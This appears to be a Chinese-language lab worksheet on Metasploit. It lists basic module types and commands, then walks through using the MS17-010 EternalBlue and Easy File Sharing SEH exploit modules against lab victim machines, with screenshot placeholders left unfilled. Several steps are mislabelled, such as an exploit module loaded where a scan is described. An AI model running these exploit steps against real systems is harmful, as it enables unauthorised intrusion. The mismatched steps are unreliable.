目录
1、使用metasploit的smb_ms17_010检测脚本,确定目标系统是否存在ms17_010漏洞。
3、载入ms17_010_eternalblue渗透模块,查看需要设置的参数并进行设置,启动模块。
3、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。
7.1 Metasploit的基础
1、Metasploit启动的三种方法:
(1)菜单
- 工具栏
(3)命令行
2、Metasploit的常用模块:
(1)exploit(漏洞渗透模块)
search exploit
payload(攻击载荷模块)
search payload
(3)auxiliary(辅助模块)
search auxiliary
(4)post(后渗透攻击模块)
search post
3、帮助help和?
help
?
3、命令几个种类:
(1)核心命令core command
1.模块命令module command
2.任务命令job command
3.资源命令resource script command
4.数据库后台命令database backed command
5.登录凭证后台命令credentials backed command
7.2 Metasploit的基本命令
最常用的几个命令:
1.show 显示
show
2.search 搜索
search
3.use 使用(某模块)
use
7.3 使用Metasploit对操作系统发起攻击
实验环境:填写如下IP地址
Kali 2主机IP: 192.168.122.128
靶机(64位windows 7,永恒之蓝靶机)IP: 192.168.122.134
1、使用metasploit的smb_ms17_010检测脚本,确定目标系统是否存在ms17_010漏洞。
(1)启动metasploit
msfconsole
- 加载smb_ms17_010检测脚本
- 对目标主机进行扫描
(输入命令或操作过程、结果截图并进行必要说明)
use exploit/windows/smb/ms17_010_eternalblue
2、查找针对MS17_010漏洞的渗透模块
(输入命令或操作过程、结果截图并进行必要说明)
show
3、载入ms17_010_eternalblue渗透模块,查看需要设置的参数并进行设置,启动模块。
(输入命令或操作过程、结果截图并进行必要说明)
set rhosts 192.168.122.134
4、启动模块
(输入命令或操作过程、结果截图并进行必要说明)
run
5、控制目标主机
(输入命令或操作过程、结果截图并进行必要说明)
7.4 使用Metasploit对软件发起攻击
实验环境:填写如下IP地址
Kali 2主机: 192.168.122.128
靶机(32位Windows 7,安装了Easy File Sharing HTTP Server)IP: 192.168.122.130
1、查找与EasyFileSharing有关的渗透模块
(1)启动Metarsploit
msfconsole
2、查找与EasyFileSharing有关的渗透模块
(输入命令或操作过程、结果截图并进行必要说明)
use EasyFileSharing
3、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。
(输入命令或操作过程、结果截图并进行必要说明)
use exploit/windows/http/easyfilesharing_seh
4、在目标靶机启动Easy File Sharing.
(输入命令或操作过程、结果截图并进行必要说明)
4、到kali中查看,会话成功建立了!
(输入命令或操作过程、结果截图并进行必要说明)